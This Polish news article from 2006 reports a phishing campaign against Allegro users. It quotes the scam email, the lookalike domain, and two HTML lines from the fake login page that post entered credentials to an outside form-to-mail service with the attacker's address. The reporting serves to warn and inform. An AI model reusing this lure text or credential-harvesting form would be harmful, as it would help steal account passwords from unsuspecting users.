Apple Facebook Google Microsoft badania bezpieczeństwo patronat DI prawa autorskie serwisy społecznościowe smartfony

Próba wyłudzenia haseł do Allegro

10-04-2006, 21:41

Jak informuje jedna z użytkowniczek grupy usenetowej alt.pl.allegro, w sieci pojawił się spam typu phisherskiego mający na celu wyłudzenie haseł do kont Allegro.

Ujawniony przez użytkowniczkę o nicku MarylkA e-mail wysłany przez oszusta (lub oszustów) ma dość prostą formę:


Twoje konto w allegro.pl zostało dodane do listy ukradzionych. Prosze zalogować się na stronie podanej poniżej w celu sprawdzenia wiarygodności zgłoszenia tego poprzez innego użytkownika allegro.pl

www.allegro.serwus.pl

Jacek Kowalski,
Dział od spraw użytkownika.


Teoretycznie już na pierwszy rzut oka widać, iż wskazany adres znajduje się poza domeną Allegro. Jeśli jednak ktoś mimo wszystko wejdzie pod wskazany adres napotka stronę bliźniaczo podobną do strony logowania do Allegro. Wizualnie różnią się one tylko dwoma szczegółami: innym przyciskiem "zaloguj się" oraz brakiem linku przełączającego pomiędzy logowaniem standardowym i bezpiecznym (SSL).

Sam kod różni sie jednak w jeszcze jednym punkcie. Formularz zawiera bowiem linie:


<form method="POST" action="http://free4web.pl/Form2Mail/">
<input type="hidden" name="email" value="keyyyyylogg@o2.pl">


Tak więc jeśli ktoś będzie na tyle nieostrożny, iż wprowadzi swoje dane do fałszywego formularza, powędrują one w zupełnie inne miejsce, zaś sama strona wyświetli podrobiony komunikat błędu.

Aktualności | Porady | Gościnnie | Katalog
Bukmacherzy | Sprawdź auto | Praca
biurowirtualnewarszawa.pl wirtualne biura w Śródmieściu Warszawy


Artykuł może w treści zawierać linki partnerów biznesowych
i afiliacyjne, dzięki którym serwis dostarcza darmowe treści.

              *              

Źródło: alt.pl.allegro